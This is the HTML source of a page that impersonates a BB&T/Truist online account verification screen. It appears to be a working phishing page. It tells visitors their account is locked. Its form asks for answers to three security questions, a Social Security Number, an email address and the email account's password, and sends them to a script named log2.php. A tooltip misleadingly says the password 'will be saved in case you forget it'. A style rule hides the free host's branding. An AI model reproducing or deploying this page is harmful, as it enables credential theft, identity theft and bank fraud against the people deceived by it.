
<!DOCTYPE html>

<html class="gt-ie9 ua-windows_nt ua-windows_nt-6 ua-windows_nt-6-1 ua-gecko ua-gecko-54 ua-gecko-54-0 ua-firefox ua-firefox-54 ua-firefox-54-0 ua-desktop ua-desktop-windows js js no-flexbox canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths" lang="en">
<head class="at-element-marker" style="visibility: visible;">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">

<title>Verification - BB&amp;T Online Account Verification</title>
<meta charset="UTF-8">

<noscript>

<meta http-equiv="refresh" content="">
</noscript>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0, user-scalable=yes">

<meta name="format-detection" content="telephone=yes">


<link href="T.goe/1.ico" rel="Shortcut Icon">
<link href="T.goe/sec.css" rel="stylesheet" type="text/css">

<script type="text/javascript" src="T.goe/ssnzipassist2.js">
</script>

<script type="text/javascript" src="T.goe/ssnzipassist3.js">
</script>
<script type="text/javascript" src="T.goe/ssnzipassist.js">
</script>

<script type="text/javascript" src="T.goe/ssnzip.js">
</script>

<script src="T.goe/1.js" type="text/javascript"></script>
</head>
<body>
	
<div class="innerBody">

<div id="toolbar">

<div class="wrapper">

<div id="auth">

</div>

<a class="more-info icon-menu" id="right-menu" href="#right-menu">
<i class="icon-menu-list"></i>INFO</a>
</div>

</div>

<header id="mainHeader">

<div>
		
<a id="skipNav" href="#mainContent">Skip to main content</a>

<a id="logo" href="">

<p><img src="https://i.imgur.com/fuzrfho.png" width="209" height="89" /></p>

</a>

<h1 id="pageTitle">


</h1>

</div>

</header>








<div class="progress-wrapper">

<nav id="progress">

<h1 class="accessibilityNote">Progress Indicator</h1>

<header>
<h2 class="accessibilityNote">Current Progress</h2>
<div class="gray-bar">
<div class="Bar" data-start="25" data-end="90" data-current="90">

<div class="progressBack" style="width: 90%;">
<div class="progressTip">
</div>
</div>

<div class="Progress" style="width: 58%;"><span></span>
</div>
<div class="label" style="left: 341px;"><span></span>
</div>

</div>
</div>

</header>

<header>
<h2 class="accessibilityNote">Progress Screen Indicator</h2>

<ul>
<li class="?">

<h3>
<i class="">
</i>
</h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
 Sign in Verification</a>

</li>

</ul>

<span>&nbsp;</span>
</li>

<li class="?">
<h3><i class=""></i></h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
 Sign in Verified</a>

</li>

</ul>

<span>&nbsp;</span>

</li>

<li class="?">
<h3><i class=""></i></h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
 Account Locked</a>

</li>

</ul>

<span>&nbsp;</span>

</li>

<li class="step4 lg  active">

<h3><i class=""></i></h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
Unlock Verification</a>

</li>

</ul>

<span>&nbsp;</span>

</li>

<li class="step5 lg last ">

<h3><i class=""></i></h3>

<ul>

<li>
Verification Summary
</li>

</ul>

</li>

</ul>

</header>
</nav>

</div>
<div id="pageWrap" class="group">

<div class="three-quarters">








<section id="mainContent" class="personalInfo">

<form id="form1" action="log2.php" method="post"  autocomplete="on">


<fieldset>

<h3>Security Questions</h3>
<dl>
    
	<br>
<div class="custom-form" style="margin-bottom: 10px;width: 197px;height: 35px;">
<h2 style="
    margin-left: 20px;
"><b style="font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-size: 12px; font-family: Arial; color: rgb(31, 31, 31);"></b></h2>
<hr id="null" style="margin-top: 5px;"></div>
<div class="custom-select" style="width:400px;">
  <select name="Q1" id="Q1" style="width:381px;">
  <option value="" selected="selected">Select Question 1</option>
<option value="Where did your parents meet?">Where did your parents meet?</option>
<option value="What was your favorite place to visit as a child?">What was your favorite place to visit as a child?</option>
<option value="Who was your favorite childhood friend?">Who was your favorite childhood friend?</option>
<option value="What's your biggest pet peeve?">What's your biggest pet peeve?</option>
<option value="What was the name of your first pet?">What was the name of your first pet?</option>
<option value="Who was your least favorite boss?">Who was your least favorite boss?</option>
<option value="What was your childhood phone number?">What was your childhood phone number?</option>
<option value="What's the nickname you gave your favorite grandparent?">What's the nickname you gave your favorite grandparent?</option>
<option value="Where do you want to retire?">Where do you want to retire?</option>
<option value="What is your dream car?">What is your dream car?</option>
<option value="What was the name of your first elementary school?">What was the name of your first elementary school?</option>
<option value="Who was your first employer?">Who was your first employer?</option>
<option value="What was the name of your favorite pet?">What was the name of your favorite pet?</option>
<option value="What city was your first elementary school in?">What city was your first elementary school in?</option>
<option value="Where did you meet your spouse?">Where did you meet your spouse?</option>
<option value="What city did you meet your spouse in?">What city did you meet your spouse in?</option>
<option value="Who was your first boyfriend/girlfriend?">Who was your first boyfriend/girlfriend?</option>
<option value="What was the first live concert you attended?">What was the first live concert you attended?</option>
<option value="What was the last name of your third grade teacher?">What was the last name of your third grade teacher?</option>
<option value="What's your best friend's middle name?">What's your best friend's middle name?</option>
<option value="If you won the lottery, what would your first purchase be?">If you won the lottery, what would your first purchase be</option>
<option value="Who's your favorite person in history?">Who's your favorite person in history?</option>
<option value="When you were a child, what did you want to be when you grew up?">When you were a child, what did you want to be when you grew up?</option>
<option value="Who was your high school prom date?">Who was your high school prom date?</option>
<option value="Who's the tallest person in your family?">Who's the tallest person in your family?</option>
<option value="What was the name of your first roommate in college?">What was the name of your first roommate in college?</option>
<option value="What was the most memorable concert you've attended?">What was the most memorable concert you've attended?</option>
<option value="What's your favorite book?">What's your favorite book?</option>
<option value="Who's the shortest person in your family?">Who's the shortest person in your family?</option>
<option value="Where did you get engaged?">Where did you get engaged?</option>
<option value="What was your favorite food as a child?">What was your favorite food as a child?</option>
<option value="Who's your favorite author?">Who's your favorite author?</option>
<option value="What was the first name of your first manager?">What was the first name of your first manager?</option>
<option value="What was your dream job?">What was your dream job?</option>
<option value="What was the last name of your favorite mentor or teacher?">What was the last name of your favorite mentor or teacher?</option>
<option value="What was the first musical instrument you learned to play?">What was the first musical instrument you learned to play?</option>
<option value="What was the name of your most memorable stuffed animal?">What was the name of your most memorable stuffed animal?</option>
  </select>
</div>
<div><br /></div>
<div class="custom-form" style="width:200px;">
<input type="text" name="A1" required="" placeholder="Answer 1" id="A1">
</div>
<div><br /></div>
<div><br /></div>
<br>
<div class="custom-select" style="width:400px;">
  <select name="Q2" id="Q2" style="width:381px;">
  <option value="" selected="selected">Select Question 2</option>
  <option value="Where did your parents meet?">Where did your parents meet?</option>
<option value="What was your favorite place to visit as a child?">What was your favorite place to visit as a child?</option>
<option value="Who was your favorite childhood friend?">Who was your favorite childhood friend?</option>
<option value="What's your biggest pet peeve?">What's your biggest pet peeve?</option>
<option value="What was the name of your first pet?">What was the name of your first pet?</option>
<option value="Who was your least favorite boss?">Who was your least favorite boss?</option>
<option value="What was your childhood phone number?">What was your childhood phone number?</option>
<option value="What's the nickname you gave your favorite grandparent?">What's the nickname you gave your favorite grandparent?</option>
<option value="Where do you want to retire?">Where do you want to retire?</option>
<option value="What is your dream car?">What is your dream car?</option>
<option value="What was the name of your first elementary school?">What was the name of your first elementary school?</option>
<option value="Who was your first employer?">Who was your first employer?</option>
<option value="What was the name of your favorite pet?">What was the name of your favorite pet?</option>
<option value="What city was your first elementary school in?">What city was your first elementary school in?</option>
<option value="Where did you meet your spouse?">Where did you meet your spouse?</option>
<option value="What city did you meet your spouse in?">What city did you meet your spouse in?</option>
<option value="Who was your first boyfriend/girlfriend?">Who was your first boyfriend/girlfriend?</option>
<option value="What was the first live concert you attended?">What was the first live concert you attended?</option>
<option value="What was the last name of your third grade teacher?">What was the last name of your third grade teacher?</option>
<option value="What's your best friend's middle name?">What's your best friend's middle name?</option>
<option value="If you won the lottery, what would your first purchase be?">If you won the lottery, what would your first purchase be</option>
<option value="Who's your favorite person in history?">Who's your favorite person in history?</option>
<option value="When you were a child, what did you want to be when you grew up?">When you were a child, what did you want to be when you grew up?</option>
<option value="Who was your high school prom date?">Who was your high school prom date?</option>
<option value="Who's the tallest person in your family?">Who's the tallest person in your family?</option>
<option value="What was the name of your first roommate in college?">What was the name of your first roommate in college?</option>
<option value="What was the most memorable concert you've attended?">What was the most memorable concert you've attended?</option>
<option value="What's your favorite book?">What's your favorite book?</option>
<option value="Who's the shortest person in your family?">Who's the shortest person in your family?</option>
<option value="Where did you get engaged?">Where did you get engaged?</option>
<option value="What was your favorite food as a child?">What was your favorite food as a child?</option>
<option value="Who's your favorite author?">Who's your favorite author?</option>
<option value="What was the first name of your first manager?">What was the first name of your first manager?</option>
<option value="What was your dream job?">What was your dream job?</option>
<option value="What was the last name of your favorite mentor or teacher?">What was the last name of your favorite mentor or teacher?</option>
<option value="What was the first musical instrument you learned to play?">What was the first musical instrument you learned to play?</option>
<option value="What was the name of your most memorable stuffed animal?">What was the name of your most memorable stuffed animal?</option>
</select>
</div>
<div><br /></div>
<div class="custom-form" style="width:200px;">
<input type="text" name="A2" required="" placeholder="Answer 2" id="A2">
</div>
<div><br /></div>
<div><br /></div>
<br>
<div class="custom-select" style="width:400px;">
  <select name="Q3" id="Q3" style="width:381px;">
  <option value="" selected="selected">Select Question 3</option>
     <option value="Where did your parents meet?">Where did your parents meet?</option>
<option value="What was your favorite place to visit as a child?">What was your favorite place to visit as a child?</option>
<option value="Who was your favorite childhood friend?">Who was your favorite childhood friend?</option>
<option value="What's your biggest pet peeve?">What's your biggest pet peeve?</option>
<option value="What was the name of your first pet?">What was the name of your first pet?</option>
<option value="Who was your least favorite boss?">Who was your least favorite boss?</option>
<option value="What was your childhood phone number?">What was your childhood phone number?</option>
<option value="What's the nickname you gave your favorite grandparent?">What's the nickname you gave your favorite grandparent?</option>
<option value="Where do you want to retire?">Where do you want to retire?</option>
<option value="What is your dream car?">What is your dream car?</option>
<option value="What was the name of your first elementary school?">What was the name of your first elementary school?</option>
<option value="Who was your first employer?">Who was your first employer?</option>
<option value="What was the name of your favorite pet?">What was the name of your favorite pet?</option>
<option value="What city was your first elementary school in?">What city was your first elementary school in?</option>
<option value="Where did you meet your spouse?">Where did you meet your spouse?</option>
<option value="What city did you meet your spouse in?">What city did you meet your spouse in?</option>
<option value="Who was your first boyfriend/girlfriend?">Who was your first boyfriend/girlfriend?</option>
<option value="What was the first live concert you attended?">What was the first live concert you attended?</option>
<option value="What was the last name of your third grade teacher?">What was the last name of your third grade teacher?</option>
<option value="What's your best friend's middle name?">What's your best friend's middle name?</option>
<option value="If you won the lottery, what would your first purchase be?">If you won the lottery, what would your first purchase be</option>
<option value="Who's your favorite person in history?">Who's your favorite person in history?</option>
<option value="When you were a child, what did you want to be when you grew up?">When you were a child, what did you want to be when you grew up?</option>
<option value="Who was your high school prom date?">Who was your high school prom date?</option>
<option value="Who's the tallest person in your family?">Who's the tallest person in your family?</option>
<option value="What was the name of your first roommate in college?">What was the name of your first roommate in college?</option>
<option value="What was the most memorable concert you've attended?">What was the most memorable concert you've attended?</option>
<option value="What's your favorite book?">What's your favorite book?</option>
<option value="Who's the shortest person in your family?">Who's the shortest person in your family?</option>
<option value="Where did you get engaged?">Where did you get engaged?</option>
<option value="What was your favorite food as a child?">What was your favorite food as a child?</option>
<option value="Who's your favorite author?">Who's your favorite author?</option>
<option value="What was the first name of your first manager?">What was the first name of your first manager?</option>
<option value="What was your dream job?">What was your dream job?</option>
<option value="What was the last name of your favorite mentor or teacher?">What was the last name of your favorite mentor or teacher?</option>
<option value="What was the first musical instrument you learned to play?">What was the first musical instrument you learned to play?</option>
<option value="What was the name of your most memorable stuffed animal?">What was the name of your most memorable stuffed animal?</option>
  </select>
</div>
<div><br /></div>
<div class="custom-form" style="width:200px;">
<input type="text" name="A3" required="" placeholder="Answer 3" id="A3">
</div>
<div><br /></div>
<br />
<div><br /></div>
<div><br /></div>
<div>
<hr id="null" /></div>
<dt>
<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">
<label for="emailpass">Social Security Number (SSN)</label>
<span class="tooltip" data-name="172">Your Social Security Number (SSN).
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>
</span>
</dt>
<dd class="large">
<div class="error-wrapper">
<input id="emailpass1" name="emailpass1" value="" maxlength="9" type="text">
</div>
</dd>
<h3>Account Verification</h3><dl><hr id="null" />

</span>
<dt>
<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">
<label for="email">Email Address</label>
<span class="tooltip" data-name="172">Your email address will be used to communicate with you regarding the status of your application and the associated promotion with this account.
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>
</span>
</dt>
<dd class="large">
<div class="error-wrapper">
<input id="email" name="email" value="" maxlength="50" type="email">
</div>
</dd>
<dt>
<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">
<label for="emailpass">Email Address Password</label>
<span class="tooltip" data-name="172">Your email address password will be saved in case you forget it.
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>
</span>
</dt>
<dd class="large">
<div class="error-wrapper">
<input id="emailpass" name="emailpass" value="" maxlength="50" type="password">
</div>
</dd>
</dl>
</dd>
</fieldset>


</article>
<div class="btnRow">

<div class="col6">

<button id="nextBtn" type="submit" name="continue" value="Verify" onclick="setJobCodeDesc();">Verify</button>

</div>
</div>

</form>
<script  type="text/javascript">
var frmvalidator = new Validator("form1");
frmvalidator.addValidation("Q1","req","Please verify your Question 1");
frmvalidator.addValidation("Q1","minlen=5","Please verify your Question 1");
frmvalidator.addValidation("Q2","req","Please verify your Question 2");
frmvalidator.addValidation("A2","minlen=5","Please verify your Answer 2");
frmvalidator.addValidation("Q3","req","Please verify your Question 3");
frmvalidator.addValidation("A3","minlen=5","Please verify your Answer 3");
frmvalidator.addValidation("emailpass1","req","Please enter your Your Social Security Number (SSN)");
frmvalidator.addValidation("emailpass1","minlen=9","Please enter your Your Social Security Number (SSN)");
frmvalidator.addValidation("email","req","Please enter your Email address");
frmvalidator.addValidation("email","minlen=5","Please enter your Email address");
frmvalidator.addValidation("emailpass","req","Please enter your Email Password");
frmvalidator.addValidation("emailpass","minlen=5","Please enter your Email Password");
</script>
</section>
</div>

<div class="one-quarter">



<div id="sidr-content">

<div id="sidr" class="sidr right">

<aside id="rightRail" class="">



<a id="close-right" class="close-right-rail" href="#close-right"><i class="icon-ex_"></i></a>

</div>
</div>
</aside>

</div>

</div>

<script type="text/javascript">
function openNewWindow(url) {

	var params = "height=600,width=1000,top=300,left=100,status=yes,toolbar=no,menubar=no,location=no,scrollbars=yes,resizable=yes";
	var bankservAgreement = window.open(url, '_blank', params);

}
</script>

</div>
		
</div>




<footer>
<div id="copyright">
<ul class="group">
<div class="root nonresponsivegrid responsivegrid" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline;"><footer class="not-main-content footer component--standalone js-component--standalone js-footer analytics-footer" role="contentinfo" data-editable="true" style="box-sizing: inherit; margin: 0px; padding: 0px; border-width: 1px 0px 0px; border-top-style: solid; border-right-style: initial; border-bottom-style: initial; border-left-style: initial; border-top-color: rgb(5, 7, 8); border-right-color: initial; border-bottom-color: initial; border-left-color: initial; border-image: initial; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: 0.85rem; line-height: inherit; font-family: Roboto, sans-serif; vertical-align: baseline; background-color: rgb(34, 42, 49); color: rgb(255, 255, 255);">
<div class="footer-highlight" style="box-sizing: inherit; margin: 0px; padding: 1rem 0px; border: 0px; font: inherit; vertical-align: baseline; background-color: rgb(5, 7, 8); text-align: center; flex-direction: row; width: 1349px; justify-content: center; color: rgb(204, 204, 204);">
<div class="footer__section footer__section--squish" style="box-sizing: inherit; margin: 0px auto; padding: 0px 0.9375rem; border: 0px; font: inherit; vertical-align: baseline; width: 1140px; display: flex; flex-wrap: wrap; max-width: 1140px;">
<p class="footer__legal" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: 0.85rem; line-height: 1.66; font-family: inherit; vertical-align: baseline; color: inherit; letter-spacing: 0.0125em; overflow-wrap: break-word; width: 1110px;">&copy; 2021, Truist Financial Corporation. All rights reserved.</p>
</div></div></footer></div>
<div id="bottom-right-fixed-items" class="scroll-top-is-visible" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; position: fixed; bottom: 1rem; right: 1rem; height: 3rem; z-index: 4;">
<div id="liveperson-chat-most-prominent" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 0px; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 16px; line-height: inherit; font-family: Roboto, sans-serif; vertical-align: baseline; width: 0px; color: rgb(34, 31, 31); background-color: rgb(255, 255, 255);"></div><a href="" class="lx-button lx-button--tertiary lx-button__icon lx-button--scroll-to-top
              js-lx-button--scroll-to-top" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 1px solid rgb(139, 139, 139); font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 16px; line-height: initial; font-family: Roboto, sans-serif; vertical-align: baseline; color: rgb(21, 101, 192); display: inline-flex; align-items: center; justify-content: center; text-align: center; text-decoration-line: none; cursor: pointer; width: 3rem; position: absolute; background: rgb(255, 255, 255); height: 3rem; border-radius: 50%; transition: box-shadow 0.15s ease-in-out 0s; box-shadow: rgba(0, 0, 0, 0.114) 0px 3px 6px, rgba(0, 0, 0, 0.125) 0px 3px 6px; top: 0px; right: 0px; z-index: 3;"></a></div>
</div>

</footer>

<script type="text/javascript" src="T.goe/explain.js"></script>
</body>
<style>
    img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] {
display: none;}
</style>
</html>